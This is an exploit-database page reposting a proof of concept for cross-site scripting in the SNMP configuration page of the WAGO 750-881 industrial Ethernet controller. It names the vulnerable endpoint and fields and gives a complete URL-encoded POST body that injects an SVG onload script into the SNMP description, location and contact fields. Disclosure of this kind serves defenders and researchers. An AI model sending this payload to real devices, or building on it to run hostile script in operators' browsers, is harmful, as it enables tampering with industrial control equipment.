Wago 750881 01.09.18 crosssite scripting Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-10-11 | Type : webapps | Platform : hardware
This exploit / vulnerability Wago 750881 01.09.18 crosssite scripting is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: WAGO 750-881 01.09.18 - Cross-Site Scripting
# Date: 2018-08-30
# Exploit Author: SecuNinja (@secuninja)
# Vendor Homepage: wago.com
# Version: 01.09.18(13) and earlier
# Affected Products: Ethernet Controller 750-881 - 01.09.18(13), 01.08.01 (10)
# CVE : N/A

# Description
# WAGO 750-881 Ethernet Controller devices, versions 01.09.18(13) and before,
# have XSS in the SNMP configuration via the webserv/cplcfg/snmp.ssi
# SNMP_DESC or SNMP_LOC_SNMP_CONT field.

# PoC
# http://ip.address/webserv/cplcfg/snmp.ssi FORM fields SNMP_DESC, SNMP_LOC_SNMP_CONT
# Exploit String "<svg/onload=alert(1)>
# http-post-data:
SNMP_DESC=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E&SNMP_LOC%22%3E%3Csvg%2Fonload%3Dalert%282%29%3E&SNMP_CONT=%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&SNMP_V1V2_ENABLE=SNMP_V1V2_ENABLE&SNMP1_LCOM_NAME=public&SNMP_TR_V1V2_1_IP=0.0.0.0&SNMP1_COM_NAME=public&SNMP_V1V2_TR1_VERSION=SNMP_V1V2_TR1_VERSION1&SNMP_TR_V1V2_2_IP=0.0.0.0&SNMP2_COM_NAME=public&SNMP_V1V2_TR2_VERSION=SNMP_V1V2_TR2_VERSION1&SUBMIT=SUBMIT

Wago 750881 01.09.18 crosssite scripting


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Wago 750881 01.09.18 crosssite scripting Vulnerability / Exploit